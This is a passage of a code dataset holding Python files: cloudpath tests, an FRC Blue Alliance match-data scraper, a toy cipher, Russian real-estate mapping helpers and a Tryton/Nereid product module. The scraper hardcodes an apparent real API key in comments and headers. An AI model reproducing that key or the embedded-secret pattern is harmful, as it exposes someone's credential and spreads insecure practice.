\"file\"\n p.download_to(dl_file)\n assert dl_file.exists()\n assert p.read_text() == dl_file.read_text()\n\n dl_dir = tmp_path / \"directory\"\n dl_dir.mkdir(parents=True, exist_ok=True)\n p3.download_to(dl_dir)\n cloud_rel_paths = sorted(\n # CloudPath(\"prefix://drive/dir/file.txt\")._no_prefix_no_drive = \"/dir/file.txt\"\n [p._no_prefix_no_drive[len(rig.test_dir) + 2 :] for p in p3.glob(\"**/*\")]\n )\n dled_rel_paths = sorted(\n [str(PurePosixPath(p.relative_to(dl_dir))) for p in dl_dir.glob(\"**/*\")]\n )\n assert cloud_rel_paths == dled_rel_paths\n\n\ndef test_cloud_path_download_to(rig, tmp_path):\n p = rig.create_cloud_path(\"dir_0/file0_0.txt\")\n dl_dir = tmp_path\n assert not (dl_dir / p.name).exists()\n p.download_to(dl_dir)\n assert (dl_dir / p.name).is_file()\n\n\ndef test_fspath(rig):\n p = rig.create_cloud_path(\"dir_0\")\n assert os.fspath(p) == p.fspath\n\n\ndef test_os_open(rig):\n p = rig.create_cloud_path(\"dir_0/file0_0.txt\")\n with open(p, \"r\") as f:\n assert f.readable()\n","sub_path":"tests/test_cloudpath_file_io.py","file_name":"test_cloudpath_file_io.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"308219973","text":"import xlwt\nimport requests\n\n# Useful links for me\n # https://www.thebluealliance.com/api/v3/events/2019/keys?X-TBA-Auth-Key=4lrD467ePfemtjf19Wga60f2xKg0yDn4qVvDjLByw12EbwQ8jDgJhO5zFX1m7qgG\n # Link to all of the keys for this year\n # https://www.thebluealliance.com/api/v3/events/2019?X-TBA-Auth-Key=4lrD467ePfemtjf19Wga60f2xKg0yDn4qVvDjLByw12EbwQ8jDgJhO5zFX1m7qgG\n # Link to all of the events for this year (more useful)\n\n# TODO\n # Fix headings\n\n''' READ: THIS FILE IS ONLY TO BE USED IF YOU MANUALLY WANT TO CONFIRM THE CARGO AND PANEL TOTALS FROM SCRIPT.PY'''\n\n################################## FOR NIKHIL AND TEJAS TO EDIT ###########################################\n\n''' Enter match key and what you want the file name to be. \n READ: The match keys for the Southfield Competition and the Marysville Competition are, respectively, \n 2019misou and 2019mimar. The key for the Week 0 competition is 2019week0 (if you need this for some reason). \n Put the correct key in for each competition. If the keys somehow don't work (yikes) visit the second link in\n the top of the program and use the filter bar in the top right of the website. '''\n\nmatch_key = \"2019misou\"\nfile_name = \"Week0_DeepSpace\"\n\n\n''' READ: If using Chrome put Chrome/72.0.3626.109 instead of Mozilla/5.0 between the quotes next to user-agent.\n Not sure if this really matters but do it just in case. Now that I think about it this really shouldn't matter\n at all but whatever. '''\n\nheaders = {\"X-TBA-Auth-Key\": \"4lrD467ePfemtjf19Wga60f2xKg0yDn4qVvDjLByw12EbwQ8jDgJhO5zFX1m7qgG\",\n \"User-agent\": \"Mozilla/5.0\"}\n\n############################################################################################################\n\n\nurl = \"https://www.thebluealliance.com/api/v3/\"\n\nr = requests.get(\"https://www.thebluealliance.com/api/v3/event/\" + match_key + \"/matches\", headers=headers).json()\n\nfile = xlwt.Workbook()\nred = file.add_sheet(\"Red Alliance\")\nblue = file.add_sheet(\"Blue Alliance\")\n\nsheets = (red, blue)\nteams = (\"red\", \"blue\")\n\n# Write data to file\ntry:\n raw_data_file = open(\"rawdata.json\", \"w\")\n\n for entry in r:\n raw_data_file.write(str(entry))\n raw_data_file.write(\"\\n \\n\")\n\nexcept IOError:\n print(\"WARNING: IOError\")\n pass\n\nlabels = (\"General\", \"Sandstorm\", \"Teleop\", \"Endgame\", \"Ranking Points\")\n\nlabels2 = (\"Record #\", \"Robots\", \"Starting Spot\", \"SStorm Action\",\n\n \"Bonus Points\", \"Total Auto Pts\",\n\n # T = Top, M = Middle, B = Bottom, L = Left, R = Right, N = Near, F = Far\n \"TL N Rocket\", \"TR N Rocket\", \"ML N Rocket\", \"MR N Rocket\", \"BL N Rocket\", \"BR N Rocket\",\n \"N Rocket Complete\",\n\n \"TL F Rocket\", \"TR F Rocket\", \"ML F Rocket\", \"MR F Rocket\", \"BL F Rocket\", \"BR F Rocket\",\n \"F Rocket Complete\",\n\n \"Pre-Storm Bay 1\", \"Pre-Storm Bay 2\", \"Pre-Storm Bay 3\", \"Pre-Storm Bay 6\",\n \"Pre-Storm Bay 7\", \"Pre-Storm Bay 8\",\n\n \"Bay 1\", \"Bay 2\", \"Bay 3\", \"Bay 4\", \"Bay 5\", \"Bay 6\", \"Bay 7\", \"Bay 8\",\n\n \"Hatch Points\", \"Cargo Points\", \"Endgame Action\", \"Total HAB Points\",\n \"Total Teleop Points\", \"Adjust Points\",\n\n \"Completed Rocket RP\", \"HAB RP\",\n\n \"Foul Count\", \"Tech Foul Count\", \"Foul Points Earned\",\n\n \"Total Points\", \"Win/Lose\", \"Total RP\")\n\n# Add labels in first row\nfor s in sheets:\n s.write(0, 0, \"General\")\n s.write(0, 2, \"Sandstorm\")\n s.write(0, 6, \"Teleop\")\n s.write(0, 20, \"Endgame/Totals\")\n 
s.write(0, 25, \"Ranking Points\")\n\n# Add match numbers\nrow = 0\n\nfor match in range(len(r)):\n for s in sheets:\n s.write(row + 2, 0, match + 1)\n row += 3\n\n# Add labels in second row\nfor label in range(len(labels2)):\n for s in sheets:\n s.write(1, label, labels2[label])\n\n# Fill in data\ncurrent_row = 2\n\nfor match in range(len(r)):\n try:\n for team in range(2):\n sheet = sheets[team]\n\n # Add team numbers\n for team_key in range(3):\n data = r[match][\"alliances\"][teams[team]][\"team_keys\"][team_key]\n sheet.write(current_row + team_key, 1, int(data.replace(\"frc\", \"\")))\n\n data = r[match][\"score_breakdown\"][teams[team]]\n\n # Starting level of robot\n for robot in range(3):\n temp = data[\"preMatchLevelRobot\" + str(robot+1)]\n sheet.write(current_row + robot, 2, temp)\n\n # Sandstorm action of each robot\n for robot in range(3):\n\n temp = data[\"habLineRobot\" + str(robot+1)]\n\n if temp == \"CrossedHabLineInSandstorm\":\n temp = \"CrossedHabInStorm\"\n\n elif temp == \"CrossedHabLineInTeleop\":\n temp = \"CrossedHabInTeleop\"\n\n sheet.write(current_row + robot, 3, temp)\n\n # Sandstorm bonus and total\n sheet.write(current_row, 4, data[\"sandStormBonusPoints\"])\n sheet.write(current_row, 5, data[\"autoPoints\"])\n\n # Near Rocket\n sheet.write(current_row, 6, data[\"lowLeftRocketNear\"])\n sheet.write(current_row, 7, data[\"lowRightRocketNear\"])\n sheet.write(current_row, 8, data[\"midLeftRocketNear\"])\n sheet.write(current_row, 9, data[\"midRightRocketNear\"])\n sheet.write(current_row, 10, data[\"topLeftRocketNear\"])\n sheet.write(current_row, 11, data[\"topRightRocketNear\"])\n\n temp = str(data[\"completedRocketNear\"])\n\n if temp == \"False\":\n temp = \"No\"\n elif temp == \"True\":\n temp = \"Yes\"\n\n sheet.write(current_row, 12, temp)\n\n # Far Rocket\n sheet.write(current_row, 13, data[\"lowLeftRocketFar\"])\n sheet.write(current_row, 14, data[\"lowRightRocketFar\"])\n sheet.write(current_row, 15, data[\"midLeftRocketFar\"])\n sheet.write(current_row, 16, data[\"midRightRocketFar\"])\n sheet.write(current_row, 17, data[\"topLeftRocketFar\"])\n sheet.write(current_row, 18, data[\"topRightRocketFar\"])\n\n temp = str(data[\"completedRocketFar\"])\n\n if temp == \"False\":\n temp = \"No\"\n elif temp == \"True\":\n temp = \"Yes\"\n\n sheet.write(current_row, 19, temp)\n\n # Pre-Sandstorm Bays\n sheet.write(current_row, 20, data[\"preMatchBay1\"])\n sheet.write(current_row, 21, data[\"preMatchBay2\"])\n sheet.write(current_row, 22, data[\"preMatchBay3\"])\n sheet.write(current_row, 23, data[\"preMatchBay6\"])\n sheet.write(current_row, 24, data[\"preMatchBay7\"])\n sheet.write(current_row, 25, data[\"preMatchBay8\"])\n\n # After match bays\n for count in range(8):\n\n temp = data[\"bay\" + str(count+1)]\n\n if temp == \"PanelAndCargo\":\n temp = \"Both\"\n\n sheet.write(current_row, 26 + count, temp)\n\n # Hatch panel points\n sheet.write(current_row, 34, data[\"hatchPanelPoints\"])\n\n # Cargo points\n sheet.write(current_row, 35, data[\"cargoPoints\"])\n\n # Endgame action\n for robot in range(3):\n temp = data[\"endgameRobot\" + str(robot + 1)]\n sheet.write(current_row + robot, 36, temp)\n\n # Total HAB climbing points\n sheet.write(current_row, 37, data[\"habClimbPoints\"])\n\n # Total teleop points\n sheet.write(current_row, 38, data[\"teleopPoints\"])\n\n # Adjust points (remove later)\n sheet.write(current_row, 39, data[\"adjustPoints\"])\n\n # Completed rocket ranking point\n temp = str(data[\"completeRocketRankingPoint\"])\n\n if temp == 
\"False\":\n temp = 0\n elif temp == \"True\":\n temp = 1\n\n sheet.write(current_row, 40, temp)\n\n # HAB docking ranking point\n temp = str(data[\"habDockingRankingPoint\"])\n\n if temp == \"False\":\n temp = 0\n elif temp == \"True\":\n temp = 1\n\n sheet.write(current_row, 41, temp)\n\n # Fouls\n sheet.write(current_row, 42, data[\"foulCount\"])\n sheet.write(current_row, 43, data[\"techFoulCount\"])\n sheet.write(current_row, 44, data[\"foulPoints\"])\n\n # Total points\n sheet.write(current_row, 45, data[\"totalPoints\"])\n\n # Win or lose (potential source for error due to if-else?)\n temp = str(r[match][\"winning_alliance\"])\n\n if temp == teams[team]:\n temp = \"Win\"\n else:\n temp = \"Loss\"\n\n sheet.write(current_row, 46, temp)\n\n # Total ranking points\n sheet.write(current_row, 47, data[\"rp\"])\n\n except TypeError:\n print(\"Ends at \" + str(match))\n\n current_row += 3\n\nfile.save(file_name + \".xls\")\n","sub_path":"2019 Deep Space /backup_script.py","file_name":"backup_script.py","file_ext":"py","file_size_in_byte":8991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"290595795","text":"#!/usr/bin/env python3\nfrom random import choice\n\ndef cifrar(texto, clave1, clave2):\n nuevo = ''\n lenclave1 = len(clave1)\n lenp2 = lenclave1//2\n for letraOriginal in range(len(texto)):\n letraReal = clave2[letraOriginal%len(clave2)]\n letrasRandom = clave1.replace(letraReal, '')+clave1.replace(letraReal, '').upper()\n for letraClave in range(lenp2):\n if clave1[letraClave] == texto[letraOriginal]:\n nuevo += letraReal\n elif clave1[letraClave+lenp2] == texto[letraOriginal]:\n nuevo += letraReal.upper()\n else:\n falsa = choice(letrasRandom)\n nuevo += falsa\n letrasRandom = letrasRandom.replace(falsa.lower(), '')\n letrasRandom = letrasRandom.replace(falsa.upper(), '')\n return nuevo\n\ndef descifrar(texto, clave1, clave2):\n lenclave1 = len(clave1)\n lenp2 = int(lenclave1/2)\n antiguo = ''\n for x in range(0, len(texto), lenp2):\n cifrada = texto[x: x+lenp2]\n caracter = clave2[int(x/lenp2)%len(clave2)]\n for y in range(lenp2):\n if caracter == cifrada[y]:\n antiguo += clave1[y]\n break\n elif caracter.upper() == cifrada[y]:\n antiguo += clave1[y+lenp2]\n break\n return antiguo\n\nif __name__ == '__main__':\n clave1 = 'qwertyuiopñlkjhgfdsazxcvbnm .,?!áéíóú/'\n clave2 = 'clavedosdeejemplo'\n CIFoDES = input('quieres cifrar o descifrar? ')\n \n if CIFoDES.startswith('o'):\n clave1 = input('clave1 = ')\n clave2 = input('clave2 = ')\n CIFoDES = input('quieres cifrar o descifrar? ')\n if CIFoDES.startswith('c'):\n print(cifrar(input(''), clave1, clave2))\n elif CIFoDES.startswith('d'):\n print(descifrar(input(''), clave1, clave2))\n\n","sub_path":"test/codigo.py","file_name":"codigo.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"228299200","text":"def get_month(x):\n month = {\n 'января': 1,\n 'февраля': 2,\n 'марта': 3,\n 'апреля': 4,\n 'мая': 5,\n 'июня': 6,\n 'июля': 7,\n 'августа': 8,\n 'сентября': 9,\n 'октября': 10,\n 'ноября': 11,\n 'декабря': 12,\n }\n\n return month.get(x.lower(), None)\n\n\ndef get_OTC(x):\n offerTypeCode = {\n 'продам': 'sale',\n 'сдам': 'rent',\n 'посуточно': 'short',\n 'продажа': 'sale',\n 'аренда': 'rent',\n 'квартиры': 'short'\n }\n\n return offerTypeCode.get(x.lower(), None)\n\n\ndef get_CC(x):\n categoryCode = {\n 'жилая': 'REZIDENTIAL',\n 'коммерческая': 'COMMERSIAL',\n 'участкиидачи': 'LAND',\n\n 'квартиры': 'REZIDENTIAL',\n 'посуточная аренда квартир': 'REZIDENTIAL',\n 'комнаты': 'REZIDENTIAL',\n 'коммерческая недвижимость': 'COMMERSIAL',\n 'дома': 'REZIDENTIAL',\n 'дачи': 'LAND',\n 'коттеджи': 'LAND',\n 'посуточная аренда домов': 'REZIDENTIAL',\n 'земельные участки': 'LAND',\n\n 'квартир': 'REZIDENTIAL',\n 'дом': 'REZIDENTIAL',\n 'коттедж': 'LAND',\n 'посуточно': 'REZIDENTIAL',\n 'помещений': 'COMMERSIAL',\n 'земельных': 'LAND',\n 'дач': 'LAND',\n }\n\n return categoryCode.get(x.lower(), None)\n\n\ndef get_BT(x):\n buildingType = {\n 'elite': 'multisection_house',\n 'business': 'multisection_house',\n 'econom': 'multisection_house',\n 'improved': 'multisection_house',\n 'brezhnev': 'multisection_house',\n 'khrushchev': 'multisection_house',\n 'stalin': 'multisection_house',\n 'old_fund': 'multisection_house',\n\n 'small_apartm': 'corridor_house',\n 'dormitory': 'corridor_house',\n 'gostinka': 'corridor_house',\n\n 'individual': 'galary_house',\n\n 'single_house': 'lowrise_house',\n 'cottage': 'lowrise_house',\n 'townhouse': 'lowrise_house',\n 'duplex': 'lowrise_house',\n\n 'IZS!!!': 'settlements_land',\n 'dacha': 'agricultural_land',\n\n 'помещение свободного назначения': 'gpurpose_place',\n 'торговое помещение': 'market_place',\n 'производственное помещение': 'production_place',\n 'здание': 'other',\n 'база': 'production_place',\n 'складское помещение': 'production_place',\n 'офисное помещение': 'office',\n\n\n 'hotel': 'gpurpose_place',\n 'restaurant': 'gpurpose_place',\n 'cafe': 'gpurpose_place',\n 'sport_building': 'gpurpose_place',\n\n 'shop': 'market_place',\n 'shops_center': 'market_place',\n 'shop_entertainment': 'market_place',\n\n 'cabinet': 'office',\n 'office_space': 'office',\n 'office_building': 'office',\n 'business_center': 'office',\n\n 'manufacture_building': 'production_place',\n 'warehouse_space': 'production_place',\n 'industrial_enterprise': 'production_place',\n }\n\n return buildingType.get(x.lower(), None)\n\n\ndef get_BC(x):\n buildingClass = {\n 'элиткласс': 'elite',\n 'бизнескласс': 'business',\n 'экономкласс': 'econom',\n 'улучшенная': 'improved',\n 'новая': 'improved',\n 'брежневка': 'brezhnev',\n 'хрущевка': 'khrushchev',\n 'сталинка': 'stalin',\n 'старыйфонд': 'old_fund',\n 'малосемейки': 'small_apartm',\n 'малосемейка': 'small_apartm',\n 'общежитие': 'dormitory',\n 'гостинка': 'gostinka',\n 'индивидуальная': 'individual',\n 'дом': 'single_house',\n 'дома': 'single_house',\n 'коттедж': 'cottage',\n 'дача': 'dacha',\n 'дачи': 'dacha',\n 'ИЖС': 'IZS!!!',\n 'таунхаус': 'townhouse',\n 'дуплекс': 'duplex',\n 'а+': 'A+'\n }\n\n return buildingClass.get(x.lower(), None)\n\n\ndef get_TC(x):\n typeCode = {\n 'доля': 'share',\n 'комната': 'room',\n 'комнаты': 'room',\n 'квартира': 'apartment',\n 'квартиры': 'apartment',\n 'дом': 'house',\n 'коттедж': 'cottage',\n 'дача': 'dacha',\n 'дачи': 'dacha',\n 'таунхаус': 'townhouse',\n 'дуплекс': 
'duplex',\n 'дачныйземельныйучасток': 'dacha_land',\n\n 'помещение свободного назначения': 'gpurpose_place',\n 'торговое помещение': 'shop',\n 'производственное помещение': 'manufacture_building',\n 'здание': 'other',\n 'база': 'manufacture_building',\n 'складское помещение': 'warehouse_space',\n 'офисное помещение': 'office_space'\n }\n\n return typeCode.get(x.lower(), None)\n","sub_path":"old version/production/rplus_import2/python-server/parsers/special_function.py","file_name":"special_function.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
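Every helper above is the same pattern: a dict lookup on the lower-cased input with None as the miss value, so callers can branch on None instead of catching KeyError. For instance:

assert get_month('Января') == 1        # lookup is case-insensitive
assert get_OTC('Продам') == 'sale'
assert get_month('nonsense') is None   # unknown keys map to None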
+{"seq_id":"366888515","text":"# -*- coding: utf-8 -*-\nfrom collections import deque\n\nfrom nereid import render_template, route\nfrom nereid.globals import session, request, current_app\nfrom nereid.helpers import slugify, url_for\nfrom nereid import jsonify, Markup, current_locale\nfrom nereid.contrib.pagination import Pagination\nfrom nereid.contrib.sitemap import SitemapIndex, SitemapSection\nfrom werkzeug.exceptions import NotFound\nfrom flask.ext.babel import format_currency\n\nfrom trytond.model import ModelSQL, ModelView, fields\nfrom trytond.pyson import Eval, Not, Bool\nfrom trytond.pool import Pool, PoolMeta\nfrom sql import Null\n\n__all__ = [\n 'Product', 'ProductsRelated', 'ProductTemplate',\n 'ProductMedia', 'ProductCategory'\n]\n\nDEFAULT_STATE = {'invisible': Not(Bool(Eval('displayed_on_eshop')))}\nDEFAULT_STATE2 = {\n 'invisible': Not(Bool(Eval('displayed_on_eshop'))),\n 'required': Bool(Eval('displayed_on_eshop')),\n}\n\n\nclass ProductMedia(ModelSQL, ModelView):\n \"Product Media\"\n __name__ = \"product.media\"\n\n sequence = fields.Integer(\"Sequence\", required=True, select=True)\n static_file = fields.Many2One(\n \"nereid.static.file\", \"Static File\", required=True, select=True)\n product = fields.Many2One(\"product.product\", \"Product\", select=True)\n template = fields.Many2One(\"product.template\", \"Template\", select=True)\n url = fields.Function(fields.Char(\"URL\"), \"get_url\")\n\n def get_url(self, name):\n return self.static_file.url\n\n @classmethod\n def __setup__(cls):\n super(ProductMedia, cls).__setup__()\n\n cls._order.insert(0, ('sequence', 'ASC'))\n\n @staticmethod\n def default_sequence():\n return 10\n\n\nclass ProductTemplate:\n __metaclass__ = PoolMeta\n __name__ = \"product.template\"\n\n products_displayed_on_eshop = fields.Function(\n fields.One2Many('product.product', None, 'Products (Disp. on eShop)'),\n 'get_products_displayed_on_eshop'\n )\n\n long_description = fields.Text('Long Description')\n\n description = fields.Text(\"Description\")\n media = fields.One2Many(\"product.media\", \"template\", \"Media\")\n images = fields.Function(\n fields.One2Many('nereid.static.file', None, 'Images'),\n getter='get_template_images'\n )\n\n def get_template_images(self, name=None):\n \"\"\"\n Getter for `images` function field\n \"\"\"\n template_images = []\n for media in self.media:\n if media.static_file.mimetype and \\\n 'image' in media.static_file.mimetype:\n template_images.append(media.static_file.id)\n return template_images\n\n def get_products_displayed_on_eshop(self, name=None):\n \"\"\"\n Return the variants that are displayed on eshop\n \"\"\"\n Product = Pool().get('product.product')\n\n return map(\n int,\n Product.search([\n ('template', '=', self.id),\n ('displayed_on_eshop', '=', True),\n ])\n )\n\n\nclass Product:\n \"Product extension for Nereid\"\n __metaclass__ = PoolMeta\n __name__ = \"product.product\"\n\n #: Decides the number of products that would be remebered.\n recent_list_size = 5\n\n #: The list of fields allowed to be sent back on a JSON response from the\n #: application. This is validated before any product info is built\n #:\n #: The `name`, `sale_price`, `id` and `uri` are sent by default\n #:\n #: .. 
versionadded:: 0.3\n json_allowed_fields = set(['rec_name', 'sale_price', 'id', 'uri'])\n\n uri = fields.Char(\n 'URI', select=True, states=DEFAULT_STATE2\n )\n\n displayed_on_eshop = fields.Boolean('Displayed on E-Shop?', select=True)\n long_description = fields.Text('Long Description')\n media = fields.One2Many(\"product.media\", \"product\", \"Media\")\n images = fields.Function(\n fields.One2Many('nereid.static.file', None, 'Images'),\n getter='get_product_images'\n )\n up_sells = fields.Many2Many(\n 'product.product-product.product',\n 'product', 'up_sell', 'Up-Sells', states=DEFAULT_STATE\n )\n cross_sells = fields.Many2Many(\n 'product.product-product.product',\n 'product', 'cross_sell', 'Cross-Sells', states=DEFAULT_STATE\n )\n default_image = fields.Function(\n fields.Many2One('nereid.static.file', 'Image'), 'get_default_image',\n )\n use_template_description = fields.Boolean(\"Use template's description\")\n\n @classmethod\n def view_attributes(cls):\n return super(Product, cls).view_attributes() + [\n ('//page[@id=\"desc\"]', 'states', {\n 'invisible': Bool(Eval('use_template_description'))\n }), ('//page[@id=\"ecomm_det\"]', 'states', {\n 'invisible': Not(Bool(Eval('displayed_on_eshop')))\n }), ('//page[@id=\"related_products\"]', 'states', {\n 'invisible': Not(Bool(Eval('displayed_on_eshop')))\n })]\n\n @classmethod\n def copy(cls, products, default=None):\n \"\"\"Duplicate products\n \"\"\"\n if default is None:\n default = {}\n default = default.copy()\n default['displayed_on_eshop'] = False\n\n duplicate_products = []\n for index, product in enumerate(products, start=1):\n if product.uri:\n default['uri'] = \"%s-copy-%d\" % (product.uri, index)\n\n duplicate_products.extend(\n super(Product, cls).copy([product], default)\n )\n\n return duplicate_products\n\n @classmethod\n def validate(cls, products):\n super(Product, cls).validate(products)\n cls.check_uri_uniqueness(products)\n\n @classmethod\n def get_default_image(cls, products, name):\n \"\"\"\n Returns default product image if any.\n \"\"\"\n res = {}\n for product in products:\n images = product.images or product.template.images\n res[product.id] = images[0].id if images else None\n return res\n\n @classmethod\n def __setup__(cls):\n super(Product, cls).__setup__()\n cls.description.states['invisible'] = Bool(\n Eval('use_template_description')\n )\n cls._error_messages.update({\n 'unique_uri': ('URI of Product must be Unique'),\n })\n cls.per_page = 12\n\n @staticmethod\n def default_displayed_on_eshop():\n return False\n\n @fields.depends('template', 'uri')\n def on_change_with_uri(self):\n \"\"\"\n If the URI is empty, slugify template name into URI\n \"\"\"\n if not self.uri and self.template:\n return slugify(self.template.name)\n return self.uri\n\n @staticmethod\n def default_use_template_description():\n return True\n\n @classmethod\n def check_uri_uniqueness(cls, products):\n \"\"\"\n Ensure uniqueness of products uri.\n \"\"\"\n query = ['OR']\n for product in products:\n # Do not check for unique uri if product is marked as\n # not displayed on eshop\n if not product.displayed_on_eshop:\n continue\n\n arg = [\n 'AND', [\n ('id', '!=', product.id)\n ], [\n ('uri', 'ilike', product.uri)\n ]\n ]\n query.append(arg)\n if query != ['OR'] and cls.search(query):\n cls.raise_user_error('unique_uri')\n\n @classmethod\n @route('/product/')\n @route('/product//')\n def render(cls, uri, path=None):\n \"\"\"Renders the template for a single product.\n\n :param uri: URI of the product\n :param path: Ignored parameter. 
This is used in\n cases where SEO friendly URL like\n product/category/sub-cat/sub-sub-cat/product-uri\n are generated\n \"\"\"\n products = cls.search([\n ('displayed_on_eshop', '=', True),\n ('uri', '=', uri),\n ('template.active', '=', True),\n ], limit=1)\n if not products:\n return NotFound('Product Not Found')\n\n cls._add_to_recent_list(int(products[0]))\n return render_template('product.jinja', product=products[0])\n\n @classmethod\n @route('/products/+recent', methods=['GET', 'POST'])\n def recent_products(cls):\n \"\"\"\n GET\n ---\n\n Return a list of recently visited products in JSON\n\n POST\n ----\n\n Add the product to the recent list manually. This method is required\n if the product page is cached, or is served by a Caching Middleware\n like Varnish which may clear the session before sending the request to\n Nereid.\n\n Just as with GET the response is the AJAX of recent products\n \"\"\"\n if request.method == 'POST':\n cls._add_to_recent_list(request.form.get('product_id', type=int))\n\n fields = set(request.args.getlist('fields')) or cls.json_allowed_fields\n fields = fields & cls.json_allowed_fields\n\n if 'sale_price' in fields:\n fields.remove('sale_price')\n\n response = []\n if hasattr(session, 'sid'):\n products = cls.browse(session.get('recent-products', []))\n for product in products:\n product_val = {}\n for field in fields:\n product_val[field] = getattr(product, field)\n product_val['sale_price'] = format_currency(\n product.sale_price(),\n current_locale.currency.code\n )\n response.append(product_val)\n\n return jsonify(products=response)\n\n @classmethod\n def _add_to_recent_list(cls, product_id):\n \"\"\"Adds the given product ID to the list of recently viewed products\n By default the list size is 5. To change this you can inherit\n product.product and set :attr:`recent_list_size` attribute to a\n non negative integer value\n\n For faster and easier access the products are stored with the ids alone\n this behaviour can be modified by subclassing.\n\n The deque object cannot be saved directly in the cache as its not\n serialisable. Hence a conversion to list is made on the fly\n\n .. versionchanged:: 0.3\n If there is no session for the user this function returns an empty\n list. This ensures that the code is consistent with iterators that\n may use the returned value\n\n :param product_id: the product id to prepend to the list\n \"\"\"\n if not hasattr(session, 'sid'):\n current_app.logger.warning(\n \"No session. Not saving to browsing history\"\n )\n return []\n\n recent_products = deque(\n session.setdefault('recent-products', []), cls.recent_list_size\n )\n # XXX: If a product is already in the recently viewed list, but it\n # would be nice to remember the recent_products list in the order of\n # visits.\n if product_id not in recent_products:\n recent_products.appendleft(product_id)\n session['recent-products'] = list(recent_products)\n return recent_products\n\n @classmethod\n @route('/products')\n @route('/products/')\n def render_list(cls, page=1):\n \"\"\"\n Renders the list of all products which are displayed_on_shop=True\n\n .. tip::\n\n The implementation uses offset for pagination and could be\n extremely resource intensive on databases. 
Hence you might want to\n either have an alternate cache/search server based pagination or\n limit the pagination to a maximum page number.\n\n The base implementation does NOT limit this and could hence result\n in poor performance\n\n :param page: The page in pagination to be displayed\n \"\"\"\n\n products = Pagination(cls, [\n ('displayed_on_eshop', '=', True),\n ('template.active', '=', True),\n ], page, cls.per_page)\n return render_template('product-list.jinja', products=products)\n\n def sale_price(self, quantity=0):\n \"\"\"Return the Sales Price.\n A wrapper designed to work as a context variable in templating\n\n The price is calculated from the pricelist associated with the current\n user. The user in the case of guest user is logged in user. In the\n event that the logged in user does not have a pricelist set against\n the user, the guest user's pricelist is chosen.\n\n Finally if neither the guest user, nor the regsitered user has a\n pricelist set against them then the list price is displayed as the\n price of the product\n\n :param quantity: Quantity\n \"\"\"\n return self.list_price\n\n @classmethod\n @route('/sitemaps/product-index.xml')\n def sitemap_index(cls):\n \"\"\"\n Returns a Sitemap Index Page\n \"\"\"\n index = SitemapIndex(cls, [\n ('displayed_on_eshop', '=', True),\n ('template.active', '=', True),\n ])\n return index.render()\n\n @classmethod\n @route('/sitemaps/product-.xml')\n def sitemap(cls, page):\n sitemap_section = SitemapSection(\n cls, [\n ('displayed_on_eshop', '=', True),\n ('template.active', '=', True),\n ], page\n )\n sitemap_section.changefreq = 'daily'\n return sitemap_section.render()\n\n def get_absolute_url(self, **kwargs):\n \"\"\"\n Return the URL of the current product.\n\n This method works only under a nereid request context\n \"\"\"\n return url_for('product.product.render', uri=self.uri, **kwargs)\n\n def _json(self):\n \"\"\"\n Return a JSON serializable dictionary of the product\n \"\"\"\n response = {\n 'template': {\n 'name': self.template.rec_name,\n 'id': self.template.id,\n 'list_price': self.list_price,\n },\n 'code': self.code,\n 'description': self.description,\n }\n return response\n\n def get_long_description(self):\n \"\"\"\n Get long description of product.\n\n If the product is set to use the template's long description, then\n the template long description is sent back.\n\n The returned value is a `~jinja2.Markup` object which makes it\n HTML safe and can be used directly in templates. It is recommended\n to use this method instead of trying to wrap this logic in the\n templates.\n \"\"\"\n if self.use_template_description:\n description = self.template.long_description\n else:\n description = self.long_description\n\n return Markup(description or '')\n\n def get_description(self):\n \"\"\"\n Get description of product.\n\n If the product is set to use the template's description, then\n the template description is sent back.\n\n The returned value is a `~jinja2.Markup` object which makes it\n HTML safe and can be used directly in templates. 
It is recommended\n to use this method instead of trying to wrap this logic in the\n templates.\n \"\"\"\n if self.use_template_description:\n description = self.template.description\n else:\n description = self.description\n return Markup(description or '')\n\n @classmethod\n def get_product_images(cls, products, name=None):\n \"\"\"\n Getter for `images` function field\n \"\"\"\n res = {}\n for product in products:\n product_images = []\n for media in product.media:\n if not media.static_file.mimetype:\n continue\n if 'image' in media.static_file.mimetype:\n product_images.append(media.static_file.id)\n res[product.id] = product_images\n return res\n\n def get_images(self):\n \"\"\"\n Get images of product variant.\n Fallback to template's images if there are no images\n for product.\n \"\"\"\n if self.images:\n return self.images\n return self.template.images\n\n\nclass ProductsRelated(ModelSQL):\n \"Related Product\"\n __name__ = 'product.product-product.product'\n _table = 'product_product_rel'\n\n product = fields.Many2One(\n 'product.product', 'Product',\n ondelete='CASCADE', select=True, required=True)\n up_sell = fields.Many2One(\n 'product.product', 'Up-sell Product',\n ondelete='CASCADE', select=True)\n cross_sell = fields.Many2One(\n 'product.product', 'Cross-sell Product',\n ondelete='CASCADE', select=True)\n\n\nclass ProductCategory:\n __metaclass__ = PoolMeta\n __name__ = 'product.category'\n\n @staticmethod\n def order_rec_name(tables):\n table, _ = tables[None]\n return [table.parent == Null, table.parent, table.name]\n\n @classmethod\n def __setup__(cls):\n super(ProductCategory, cls).__setup__()\n cls.rec_name.string = \"Parent/name\"\n","sub_path":"product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":17145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
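The recently-viewed logic in _add_to_recent_list above is a bounded deque of product ids rebuilt from the session on every call; the core behavior in isolation:

from collections import deque

recent = deque([3, 7, 9], 5)  # second argument mirrors recent_list_size
recent.appendleft(12)         # newest product id goes to the front
print(list(recent))           # [12, 3, 7, 9]; the oldest falls off once full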
